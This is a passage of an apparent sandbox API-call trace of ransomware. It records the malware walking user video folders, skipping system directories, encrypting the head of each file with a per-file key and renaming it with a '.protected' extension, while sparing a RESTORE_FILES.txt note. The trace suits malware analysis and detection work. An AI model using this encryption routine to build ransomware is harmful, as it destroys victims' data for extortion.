(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".zip") returned 0x0 [0092.947] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.948] CloseHandle (hObject=0xd4) returned 1 [0092.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4.protected") returned 70 [0092.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4.protected")) returned 1 [0093.025] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Windows") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Program Files") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Program Files (x86)") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="$Recycle.bin") returned 1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="System Volume Information") returned -1 [0093.025] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.025] StrStrIW (lpFirst="mZNTmLBNO.avi", lpSrch=".protected") returned 0x0 [0093.025] lstrcmpW 
(lpString1="mZNTmLBNO.avi", lpString2="RESTORE_FILES.txt") returned -1 [0093.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".txt") returned 0x0 [0093.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".rar") returned 0x0 [0093.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".zip") returned 0x0 [0093.026] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.026] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.026] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.027] SetFilePointerEx (in: hFile=0xd4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.027] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0093.027] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0093.027] CloseHandle (hObject=0xd4) returned 1 [0093.028] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi.protected") returned 75 [0093.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi.protected")) returned 1 [0093.029] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Windows") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Program Files") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Program Files (x86)") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="System Volume Information") returned 1 [0093.029] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq") returned 56 [0093.029] lstrcmpW (lpString1="wljq", lpString2=".") returned 1 [0093.029] lstrcmpW 
(lpString1="wljq", lpString2="..") returned 1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\*") returned 58 [0093.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\.") returned 58 [0093.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.029] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\..") returned 59 [0093.029] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.029] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.029] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.029] lstrcmpiW 
(lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Windows") returned 1 [0093.029] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Program Files") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Program Files (x86)") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="$Recycle.bin") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="System Volume Information") returned 1 [0093.030] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrIW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".protected") returned 0x0 [0093.030] lstrcmpW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="RESTORE_FILES.txt") returned 1 [0093.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".txt") returned 0x0 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".rar") 
returned 0x0 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".zip") returned 0x0 [0093.030] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x1654, lpOverlapped=0x0) returned 1 [0093.031] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffe9ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x1654, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x1654, lpOverlapped=0x0) returned 1 [0093.031] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0093.031] CloseHandle (hObject=0xd8) returned 1 [0093.032] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf.protected") returned 91 [0093.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf.protected")) returned 1 [0093.032] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Windows") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Program Files") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Program Files (x86)") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="$Recycle.bin") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="System Volume Information") returned 1 [0093.032] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrIW (lpFirst="z2RipTdMsu.flv", lpSrch=".protected") returned 0x0 [0093.033] lstrcmpW (lpString1="z2RipTdMsu.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW 
(lpFirst="z2RipTdMsu.flv", lpSrch=".txt") returned 0x0 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW (lpFirst="z2RipTdMsu.flv", lpSrch=".rar") returned 0x0 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW (lpFirst="z2RipTdMsu.flv", lpSrch=".zip") returned 0x0 [0093.033] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0093.034] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0093.034] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0093.034] CloseHandle (hObject=0xd8) returned 1 [0093.034] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv.protected") returned 81 [0093.034] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv.protected")) returned 1 [0093.035] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Windows") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Program Files") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Program Files (x86)") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="$Recycle.bin") returned 1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="System Volume Information") returned -1 [0093.035] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4") returned 61 [0093.035] lstrcmpW (lpString1="_7Z4", lpString2=".") returned 1 [0093.035] lstrcmpW (lpString1="_7Z4", lpString2="..") returned 1 [0093.035] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\*") returned 63 [0093.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.035] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.035] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1=".", lpString2="System Volume Information") 
returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\.") returned 63 [0093.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.036] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\..") returned 64 [0093.036] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.036] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.036] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Windows") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="System Volume Information") returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.036] StrStrIW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".protected") returned 0x0 [0093.036] lstrcmpW 
(lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.036] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.036] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".txt") returned 0x0 [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".rar") returned 0x0 [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".zip") returned 0x0 [0093.037] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.037] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.037] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: 
